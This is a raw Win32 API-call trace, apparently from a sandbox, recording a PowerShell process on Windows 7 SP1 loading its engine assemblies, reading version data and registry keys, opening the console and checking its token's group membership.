	[0089.865] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x18d7d0 | out: lpFileInformation=0x18d7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0089.865] SetErrorMode (uMode=0x1) returned 0x1
	[0089.865] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x18da40 | out: lpdwHandle=0x18da40) returned 0x94c
	[0089.866] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d856d0 | out: lpData=0x2d856d0) returned 1
	[0089.866] VerQueryValueW (in: pBlock=0x2d856d0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18d9b8, puLen=0x18d9b0 | out: lplpBuffer=0x18d9b8*=0x2d8576c, puLen=0x18d9b0) returned 1
	[0089.866] VerQueryValueW (in: pBlock=0x2d856d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x18d928, puLen=0x18d920 | out: lplpBuffer=0x18d928*=0x2d85848, puLen=0x18d920) returned 1
	[0089.866] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0089.866] CoTaskMemAlloc (cb=0x2e) returned 0x280340
	[0089.867] lstrcpyW (in: lpString1=0x280340, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0089.867] CoTaskMemFree (pv=0x280340) 
	[0089.867] VerQueryValueW (in: pBlock=0x2d856d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x18d928, puLen=0x18d920 | out: lplpBuffer=0x18d928*=0x2d8589c, puLen=0x18d920) returned 1
	[0089.867] lstrlenW (lpString="System.Management.Automation") returned 28
	[0089.867] CoTaskMemAlloc (cb=0x3c) returned 0x288bd0
	[0089.867] lstrcpyW (in: lpString1=0x288bd0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0089.867] CoTaskMemFree (pv=0x288bd0) 
	[0089.867] VerQueryValueW (in: pBlock=0x2d856d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x18d928, puLen=0x18d920 | out: lplpBuffer=0x18d928*=0x2d858f8, puLen=0x18d920) returned 1
	[0089.867] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0089.867] CoTaskMemAlloc (cb=0x20) returned 0x286820
	[0089.867] lstrcpyW (in: lpString1=0x286820, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0089.867] CoTaskMemFree (pv=0x286820) 
	[0089.867] VerQueryValueW (in: pBlock=0x2d856d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x18d928, puLen=0x18d920 | out: lplpBuffer=0x18d928*=0x2d85938, puLen=0x18d920) returned 1
	[0089.867] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0089.867] CoTaskMemAlloc (cb=0x44) returned 0x288bd0
	[0089.867] lstrcpyW (in: lpString1=0x288bd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0089.867] CoTaskMemFree (pv=0x288bd0) 
	[0089.867] VerQueryValueW (in: pBlock=0x2d856d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x18d928, puLen=0x18d920 | out: lplpBuffer=0x18d928*=0x2d859a0, puLen=0x18d920) returned 1
	[0089.867] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0089.867] CoTaskMemAlloc (cb=0x76) returned 0x21df00
	[0089.867] lstrcpyW (in: lpString1=0x21df00, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0089.867] CoTaskMemFree (pv=0x21df00) 
	[0089.867] VerQueryValueW (in: pBlock=0x2d856d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x18d928, puLen=0x18d920 | out: lplpBuffer=0x18d928*=0x2d85a3c, puLen=0x18d920) returned 1
	[0089.867] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0089.867] CoTaskMemAlloc (cb=0x44) returned 0x288bd0
	[0089.867] lstrcpyW (in: lpString1=0x288bd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0089.867] CoTaskMemFree (pv=0x288bd0) 
	[0089.867] VerQueryValueW (in: pBlock=0x2d856d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x18d928, puLen=0x18d920 | out: lplpBuffer=0x18d928*=0x2d85aa0, puLen=0x18d920) returned 1
	[0089.867] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0089.867] CoTaskMemAlloc (cb=0x58) returned 0x1d4c70
	[0089.867] lstrcpyW (in: lpString1=0x1d4c70, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0089.867] CoTaskMemFree (pv=0x1d4c70) 
	[0089.867] VerQueryValueW (in: pBlock=0x2d856d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x18d928, puLen=0x18d920 | out: lplpBuffer=0x18d928*=0x2d85b1c, puLen=0x18d920) returned 1
	[0089.867] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0089.868] CoTaskMemAlloc (cb=0x20) returned 0x286820
	[0089.868] lstrcpyW (in: lpString1=0x286820, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0089.868] CoTaskMemFree (pv=0x286820) 
	[0089.868] VerQueryValueW (in: pBlock=0x2d856d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x18d928, puLen=0x18d920 | out: lplpBuffer=0x18d928*=0x2d857c4, puLen=0x18d920) returned 1
	[0089.868] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0089.868] CoTaskMemAlloc (cb=0x66) returned 0x2840a0
	[0089.868] lstrcpyW (in: lpString1=0x2840a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0089.868] CoTaskMemFree (pv=0x2840a0) 
	[0089.868] VerQueryValueW (in: pBlock=0x2d856d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x18d928, puLen=0x18d920 | out: lplpBuffer=0x18d928*=0x0, puLen=0x18d920) returned 0
	[0089.868] VerQueryValueW (in: pBlock=0x2d856d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x18d928, puLen=0x18d920 | out: lplpBuffer=0x18d928*=0x0, puLen=0x18d920) returned 0
	[0089.868] VerQueryValueW (in: pBlock=0x2d856d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x18d928, puLen=0x18d920 | out: lplpBuffer=0x18d928*=0x0, puLen=0x18d920) returned 0
	[0089.868] VerQueryValueW (in: pBlock=0x2d856d0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18d8f8, puLen=0x18d8f0 | out: lplpBuffer=0x18d8f8*=0x2d8576c, puLen=0x18d8f0) returned 1
	[0089.868] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0089.868] VerLanguageNameW (in: wLang=0x0, szLang=0x2189c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0089.868] CoTaskMemFree (pv=0x2189c0) 
	[0089.868] VerQueryValueW (in: pBlock=0x2d856d0, lpSubBlock="\\", lplpBuffer=0x18d948, puLen=0x18d940 | out: lplpBuffer=0x18d948*=0x2d856f8, puLen=0x18d940) returned 1
	[0089.876] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0089.876] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.877] CoTaskMemFree (pv=0x235590) 
	[0089.892] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d818 | out: phkResult=0x18d818*=0x308) returned 0x0
	[0090.071] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d808 | out: phkResult=0x18d808*=0x30c) returned 0x0
	[0090.071] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d898 | out: phkResult=0x18d898*=0x310) returned 0x0
	[0090.075] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d7dc, lpData=0x0, lpcbData=0x18d7d8*=0x0 | out: lpType=0x18d7dc*=0x1, lpData=0x0, lpcbData=0x18d7d8*=0x56) returned 0x0
	[0090.076] CoTaskMemAlloc (cb=0x5a) returned 0x284030
	[0090.076] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d7ac, lpData=0x284030, lpcbData=0x18d7a8*=0x56 | out: lpType=0x18d7ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d7a8*=0x56) returned 0x0
	[0090.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.200] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0090.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.200] CoTaskMemFree (pv=0x235590) 
	[0091.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0091.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x18d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0092.677] CoTaskMemAlloc (cb=0x104) returned 0x2356a0
	[0092.677] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2356a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0092.677] CoTaskMemFree (pv=0x2356a0) 
	[0092.679] CoTaskMemAlloc (cb=0x104) returned 0x2356a0
	[0092.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2356a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0092.679] CoTaskMemFree (pv=0x2356a0) 
	[0092.705] CoTaskMemAlloc (cb=0x104) returned 0x2356a0
	[0092.705] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2356a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0092.706] CoTaskMemFree (pv=0x2356a0) 
	[0092.707] CoTaskMemAlloc (cb=0x104) returned 0x2356a0
	[0092.707] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2356a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0092.707] CoTaskMemFree (pv=0x2356a0) 
	[0093.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x18d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0093.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x18d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0093.557] CoTaskMemAlloc (cb=0x104) returned 0x2356a0
	[0093.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2356a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0093.557] CoTaskMemFree (pv=0x2356a0) 
	[0093.561] CoTaskMemAlloc (cb=0x104) returned 0x2356a0
	[0093.561] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2356a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0093.561] CoTaskMemFree (pv=0x2356a0) 
	[0093.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0093.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0095.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x18d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0095.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x18d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0095.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0095.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0096.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0096.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0099.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0099.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0099.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0100.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.814] bsearch (_Key=0x18ad50, _Base=0x642ff4a1d90, _NumOfElements=0xcc, _SizeOfElements=0x18, _PtFuncCompare=0x642ff4a337c) returned 0x642ff4a2498
	[0107.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.843] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0107.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.843] CoTaskMemFree (pv=0x2358c0) 
	[0108.121] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0108.121] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.121] CoTaskMemFree (pv=0x2358c0) 
	[0108.121] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0108.121] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.121] CoTaskMemFree (pv=0x2358c0) 
	[0108.124] CoCreateGuid (in: pguid=0x18db38 | out: pguid=0x18db38*(Data1=0x89df4e2b, Data2=0x5144, Data3=0x4848, Data4=([0]=0x9b, [1]=0xab, [2]=0x44, [3]=0xd0, [4]=0x7a, [5]=0xe3, [6]=0xdf, [7]=0x88))) returned 0x0
	[0108.600] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0108.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.600] CoTaskMemFree (pv=0x2358c0) 
	[0108.603] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0108.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.603] CoTaskMemFree (pv=0x2358c0) 
	[0109.099] CoTaskMemAlloc (cb=0x104) returned 0x2358c0
	[0109.099] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2358c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.099] CoTaskMemFree (pv=0x2358c0) 
	[0109.104] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0109.105] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x18d7e0 | out: lpConsoleScreenBufferInfo=0x18d7e0) returned 1
	[0109.110] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0109.110] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x18d7e0 | out: lpConsoleScreenBufferInfo=0x18d7e0) returned 1
	[0109.111] GetVersionExW (in: lpVersionInformation=0x18d770*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18d770*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0109.113] GetCurrentProcess () returned 0xffffffffffffffff
	[0109.114] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18d808 | out: TokenHandle=0x18d808*=0x324) returned 1
	[0109.118] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18d728 | out: TokenInformation=0x0, ReturnLength=0x18d728) returned 0
	[0109.119] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1e38c0
	[0109.119] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x1e38c0, TokenInformationLength=0x4, ReturnLength=0x18d728 | out: TokenInformation=0x1e38c0, ReturnLength=0x18d728) returned 1
	[0109.120] DuplicateTokenEx (in: hExistingToken=0x324, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x18d888 | out: phNewToken=0x18d888*=0x320) returned 1
	[0109.120] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18d728 | out: TokenInformation=0x0, ReturnLength=0x18d728) returned 0
	[0109.120] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1e38f0
	[0109.120] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x1e38f0, TokenInformationLength=0x4, ReturnLength=0x18d728 | out: TokenInformation=0x1e38f0, ReturnLength=0x18d728) returned 1
	[0109.121] CheckTokenMembership (in: TokenHandle=0x320, SidToCheck=0x2e60478*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18d898 | out: IsMember=0x18d898) returned 1
	[0109.121] CloseHandle (hObject=0x320) returned 1
	[0109.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x18d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
